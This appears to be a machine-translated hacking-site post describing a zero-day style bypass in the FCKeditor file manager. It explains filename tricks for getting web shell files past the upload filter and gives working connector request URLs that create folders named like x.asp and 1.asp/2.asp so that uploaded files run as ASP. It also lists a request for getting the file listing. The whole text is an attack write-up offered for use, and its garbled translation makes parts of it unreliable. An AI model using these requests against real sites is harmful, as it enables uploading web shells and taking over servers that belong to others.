FCK 0day FCKeditor create a folder,Upload a file when"." Change"_"to break-vulnerability warning-the black bar safety net

ID MYHACK58:62201236412
Type myhack58
Reporter 佚名
Modified 2012-12-27T00:00:00


A lot of times the uploaded file for example: shell.php.rar or shell.php;. jpg becomes shell_php;. jpg this is the new version of the FCK change, try to upload 1. asp;jpg

Submitted shell.php+space to get around, but the spaces only support win system is *nix is not supported, shell.php and shell.php+spaces is 2 different files, not the test.

Continue to upload the same file variable for shell.php;(1). jpg, you can also create a new folder, only the detection of the first level of the directory, if the jump to a secondary directory is not limited.

Breakthrough in the build folder:

editor/FCKeditor/editor/filemanager/connectors/asp/connector. asp? Command=CreateFolder&Type=Image&CurrentFolder=/qing. asp&NewFolderName=x. asp


The current directory name: CurrentFolder=/qing. asp

New directory name: NewFolderName=x. asp

Actually very simple, in the directory where the write x. asp, and then click new catalog in the pop-up dialog box, just write......

Then x. asp has been established to generate, this approach hundred test Braun the!

New folder the parameter x. asp, basic can get.

The following phrase is to be in the 1. asp established under 2. asp, when there is no 1. asp when first created, filter only the target directory is created and no filter does not exist in the directory created

aspx/connector. aspx? Command=CreateFolder&Type=File&CurrentFolder=%2F1. asp&NewFolderName=2. asp

Get the file list aspx/connector. aspx? Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F